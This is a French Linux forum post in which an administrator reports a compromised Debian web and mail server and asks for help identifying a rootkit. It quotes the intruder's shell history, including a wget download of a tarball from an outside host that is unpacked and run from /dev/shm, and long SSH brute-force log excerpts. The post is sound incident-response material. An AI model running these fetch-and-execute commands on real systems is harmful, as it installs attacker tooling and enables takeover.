URL: https://linuxfr.org/forums/linux-general/posts/machine-compromise Title: Machine compromise. Authors: JM Baty Date: 2013年07月08日T15:23:04+02:00 License: CC By-SA Tags: Score: 14 Salut, Je viens de constater avec effroi que j'ai une machine compromise. Il s'agit d'un serveur web/courrier/fichiers/multimédia qui tourne dans un conteneur lxc. L’hôte et la machine sont en debian/wheezy. Pour l'heure j'ai arrêté la machine, couper les ports de la box, changer et vérifier la plupart des binaires, mais au redémarrage, la machine accepte n'importe quel mot de passe pour n'importe quel utilisateur y compris root. Sur une console, le système ne me demande même pas de mot passe;, si je donne un identifiant valable, je suis directement loggé !! Je n'arrive pas à voir par quelle diablerie, le système se comporte comme cela. Pourtant celui qui a hacké ma machine, n'a pas l'air d'être un cador, vu qu'il a laissé plein de traces, voici ce qu'il a exécuté en tant que root: w id id cd /dev/shm ls -a rm -rf flood cd ~ ls -a cd .ssh ls -a cat known_hosts cat /proc/cpuinfo |grep proc cd /dev/shm ls -a mkdir " " wget http://kao.at.ua/tobi.tar tar zxvf tobi.tar tar xvf tobi.tar rm -rf tobi.tar cd tobi1 ls -a nano 1 cat 1 ./start chmod +x * ./start 5 w cd ~ ls -a cat /etc/issue cd /dev/shm ls -a cd tobi1 ls -a ./start ./start 130 On voit donc qu'il est allé récupérer un rootkit et qu'il l'a installé, mais je n'arrive pas ni à identifier le rootkit en question, ni ce qu'il fait exactement. La seule chose certaine c'est qu'il contient des binaires pour remplacer sshd, ss, sz, pico et deux ou trois bricoles. J'ai remis en place les binaires de wheezy, mais cela ne change rien. Sinon voici les traces que j'ai relevé dans /var/auth.log: Jun 28 11:25:24 lot sshd[13885]: Accepted password for root from 37.200.68.143 port 35605 ssh2 Jun 28 11:25:45 lot sshd[13885]: Received disconnect from 37.200.68.143: 11: Bye Bye Jun 28 11:27:45 lot sshd[13900]: Accepted password for root from 37.200.68.143 port 43837 ssh2 Jun 28 11:28:06 lot sshd[13900]: Received disconnect from 37.200.68.143: 11: Bye Bye Jun 28 11:28:32 lot sshd[13910]: Accepted password for root from 5.99.129.34 port 57216 ssh2 Jun 28 11:30:06 lot sshd[13952]: Invalid user oracle from 37.200.68.143 Jun 28 11:30:06 lot sshd[13952]: input_userauth_request: invalid user oracle [preauth] Jun 28 11:30:06 lot sshd[13952]: Failed password for invalid user oracle from 37.200.68.143 port 52070 ssh2 Jun 28 11:30:06 lot sshd[13952]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth] Jun 28 11:31:15 lot sshd[13979]: Accepted password for root from 5.99.129.34 port 57229 ssh2 Jun 28 11:31:16 lot sshd[13979]: subsystem request for sftp by user root Jun 28 11:32:13 lot sshd[13992]: Accepted password for root from 5.99.129.34 port 57233 ssh2 Jun 28 11:32:14 lot sshd[13992]: subsystem request for sftp by user root Jun 28 11:32:27 lot sshd[13996]: Accepted password for test from 37.200.68.143 port 60302 ssh2 Jun 28 11:32:48 lot sshd[13998]: Received disconnect from 37.200.68.143: 11: Bye Bye Jun 28 11:33:58 lot sshd[14015]: Accepted password for root from 5.99.129.34 port 57239 ssh2 Jun 28 11:33:59 lot sshd[14015]: subsystem request for sftp by user root Jun 28 11:34:48 lot sshd[14023]: Invalid user levente from 37.200.68.143 Jun 28 11:34:48 lot sshd[14023]: input_userauth_request: invalid user levente [preauth] Jun 28 11:34:48 lot sshd[14023]: Failed password for invalid user levente from 37.200.68.143 port 40301 ssh2 Jun 28 11:34:48 lot sshd[14023]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth] Jun 28 11:36:36 lot sshd[14060]: Accepted password for root from 5.99.129.34 port 57248 ssh2 Jun 28 11:36:37 lot sshd[14060]: subsystem request for sftp by user root Jun 28 11:37:10 lot sshd[14068]: Invalid user linux from 37.200.68.143 Jun 28 11:37:10 lot sshd[14068]: input_userauth_request: invalid user linux [preauth] Jun 28 11:37:10 lot sshd[14068]: Failed password for invalid user linux from 37.200.68.143 port 48533 ssh2 Jun 28 11:37:10 lot sshd[14068]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth] Jun 28 11:39:31 lot sshd[14095]: Invalid user nagios from 37.200.68.143 Jun 28 11:39:31 lot sshd[14095]: input_userauth_request: invalid user nagios [preauth] Jun 28 11:39:31 lot sshd[14095]: Failed password for invalid user nagios from 37.200.68.143 port 56767 ssh2 Jun 28 11:39:31 lot sshd[14095]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth] Jun 28 11:41:52 lot sshd[14134]: Invalid user media from 37.200.68.143 Jun 28 11:41:52 lot sshd[14134]: input_userauth_request: invalid user media [preauth] Jun 28 11:41:52 lot sshd[14134]: Failed password for invalid user media from 37.200.68.143 port 36785 ssh2 Jun 28 11:41:52 lot sshd[14134]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth] Jun 28 11:44:14 lot sshd[14152]: Invalid user cvs from 37.200.68.143 Jun 28 11:44:14 lot sshd[14152]: input_userauth_request: invalid user cvs [preauth] Jun 28 11:44:14 lot sshd[14152]: Failed password for invalid user cvs from 37.200.68.143 port 45018 ssh2 Jun 28 11:44:14 lot sshd[14152]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth] Jun 28 11:46:35 lot sshd[14184]: Invalid user dms from 37.200.68.143 Jun 28 11:46:35 lot sshd[14184]: input_userauth_request: invalid user dms [preauth] Jun 28 11:46:35 lot sshd[14184]: Failed password for invalid user dms from 37.200.68.143 port 53249 ssh2 Jun 28 11:46:35 lot sshd[14184]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth] Jun 28 11:48:56 lot sshd[14199]: Invalid user xbmc from 37.200.68.143 Jun 28 11:48:56 lot sshd[14199]: input_userauth_request: invalid user xbmc [preauth] Jun 28 11:48:56 lot sshd[14199]: Failed password for invalid user xbmc from 37.200.68.143 port 33248 ssh2 Jun 28 11:48:56 lot sshd[14199]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth] Jun 28 11:51:18 lot sshd[14235]: Accepted password for daemon from 37.200.68.143 port 41481 ssh2 Jun 28 11:51:39 lot sshd[14238]: Received disconnect from 37.200.68.143: 11: Bye Bye Jun 28 11:53:39 lot sshd[14255]: Invalid user postfix from 37.200.68.143 Jun 28 11:53:39 lot sshd[14255]: input_userauth_request: invalid user postfix [preauth] Jun 28 11:53:39 lot sshd[14255]: Failed password for invalid user postfix from 37.200.68.143 port 49713 ssh2 Jun 28 11:53:39 lot sshd[14255]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth] Jun 28 11:56:00 lot sshd[14288]: Invalid user ferenc from 37.200.68.143 Jun 28 11:56:00 lot sshd[14288]: input_userauth_request: invalid user ferenc [preauth] Jun 28 11:56:00 lot sshd[14288]: Failed password for invalid user ferenc from 37.200.68.143 port 57945 ssh2 Jun 28 11:56:01 lot sshd[14288]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth] Jun 28 11:58:22 lot sshd[14313]: Invalid user andrea from 37.200.68.143 Jun 28 11:58:22 lot sshd[14313]: input_userauth_request: invalid user andrea [preauth] Jun 28 11:58:22 lot sshd[14313]: Failed password for invalid user andrea from 37.200.68.143 port 37944 ssh2 Jun 28 11:58:22 lot sshd[14313]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth] Jun 28 12:00:43 lot sshd[14348]: Invalid user testuser from 37.200.68.143 Jun 28 12:00:43 lot sshd[14348]: input_userauth_request: invalid user testuser [preauth] Jun 28 12:00:43 lot sshd[14348]: Failed password for invalid user testuser from 37.200.68.143 port 46177 ssh2 Jun 28 12:00:43 lot sshd[14348]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth] Jun 28 12:01:35 lot sshd[14356]: Accepted password for daemon from 5.99.129.34 port 57359 ssh2 Jun 28 12:02:33 lot sshd[14384]: Accepted password for daemon from 5.99.129.34 port 57363 ssh2 Jun 28 12:02:33 lot sshd[14386]: subsystem request for sftp by user daemon Jun 28 12:03:04 lot sshd[14396]: Invalid user svn from 37.200.68.143 Jun 28 12:03:04 lot sshd[14396]: input_userauth_request: invalid user svn [preauth] Jun 28 12:03:04 lot sshd[14396]: Failed password for invalid user svn from 37.200.68.143 port 54408 ssh2 Jun 28 12:03:04 lot sshd[14396]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth] Jun 28 18:06:28 lot sshd[18301]: Accepted password for daemon from 94.37.167.58 port 57191 ssh2 Jul 3 18:03:28 lot sshd[32468]: Accepted password for daemon from 94.37.214.231 port 55940 ssh2 Jul 3 18:04:25 lot su[32485]: No passwd entry for user 'su' Jul 3 18:04:25 lot su[32485]: FAILED su for su by daemon Jul 3 18:04:25 lot su[32485]: - /dev/pts/1 daemon:su Jul 3 18:04:28 lot su[32486]: Successful su for root by daemon Jul 3 18:04:28 lot su[32486]: + /dev/pts/1 daemon:root Jul 4 11:18:53 lot sshd[27384]: Accepted password for root from 94.37.205.157 port 50946 ssh2 Jul 4 13:34:03 lot sshd[4414]: Accepted password for root from 5.99.129.34 port 56633 ssh2 Merci d'avance pour toute piste, JMB

AltStyle によって変換されたページ (->オリジナル) /